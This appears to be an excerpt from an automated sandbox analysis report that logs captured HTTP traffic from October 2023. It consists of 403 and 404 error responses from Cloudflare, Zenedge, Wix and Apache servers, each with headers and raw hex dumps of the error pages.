                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:12 GMTServer: ApacheVary: X-Forwarded-For,Host,User-AgentX-Powered-By: PHP/5.3.3Content-Length: 1018Content-Type: text/html; charset=shift_jisData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 73 68 69 66 74 5f 6a 69 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 83 41 83 4e 83 5a 83 58 83 47 83 89 81 5b 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 62 61 73 65 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 69 64 3d 22 42 4d 61 6e 61 67 65 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 42 4d 61 69 6e 43 6f 6e 74 65 6e 74 73 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 46 65 6e 63 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 62 6f 78 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 5f 34 30 30 2e 67 69 66 22 20 61 6c 74 3d 22 22 20 2f 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 74 61 62 6c 65 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:13 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oeKAhn0CyITkUZsOeD5kzIgeMYbjuQTr60MrUnCMJcGCOWNy%2FzVpmcAIbvfDJNwxyuKwpWlY5tAQ3PJcwofsHIHbeFEgPRMXlvuep7mg0bhNRunXSjq%2BoCXLYhmZl7j5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 813717635eda52b9-LAXalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:13 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sH%2B8QTXQJVNnYcGMv7psuAkEyxXRG7wXzSadF8KeKyaFemx6UnFj1qyJJyAh4Fyd17jZP6tXw7RqG%2FTrgV4oNV6DFWqcOkJFfqmx9EmbMLrcq7o0FHF1jp7vFpO32YiL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 81371764b80552b9-LAXalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 09 Oct 2023 13:50:31 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gVbIodaljagDUACwUedq90YCuXtyh75YCuVKCgG2QMkfEjJGGOIMCezJNXl%2BHpsDwYYP%2BWwwiDFDbJNH0yHGuUixr5RwqJNxh6aQeNKaSdBurE%2BoES%2BTjURmw73KmnU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 81371778a809150a-LAXalt-svc: h3=":443"; ma=86400Data Raw: 31 35 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f Data Ascii: 15e3<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv=
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0Date: Mon, 09 Oct 2023 13:50:17 GMTX-Zen-Fury: 633e3f050da14443a98eaaad01eee9eb6d7406f9Server: ZENEDGEX-Cache-Status: Data Raw: 32 61 61 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 34 37 37 37 22 2c 20 31 36 39 36 38 35 39 34 31 37 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 39 36 38 35 39 34 31 37 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 31 35 36 37 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 4d 6f 6e 2c 20 30 39 20 4f 63 74 20 32 30 32 33 20 31 33 3a 35 32 3a 31 37 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2aa<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC4777", 1696859417, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1696859417 * 3.1415926535898; v = Math.floor(v); do
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:50:22 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlServer: Pepyaka/1.19.10X-Wix-Request-Id: 1696859422.62531675184021229398X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Mon, 09 Oct 2023 13:50:22 GMTX-Served-By: cache-bur-kbur8200129-BURX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,9WD8GAcpJgs/Ng1WkD2i0h9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLphoU3jq5qfwwcSFGrvTcVoG/hKs8AeY1T4OIbgnD+yxVia: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4514Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 09 Oct 2023 13:50:37 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=q2XALMuFVQKuTgg7yTo8JeVzuBdn9vkBnJgGy8lOhrCrFOa8wnPLKDannf7IOBLlwU7rNw0Ie2OsPYzKjHcgZDixGd%2BzO1y%2BPHTZiw0pNLnWWvq7kNTpvc8DUXqf3aW%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 813717a0a9d22ec3-LAXData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-eq
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:50:24 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
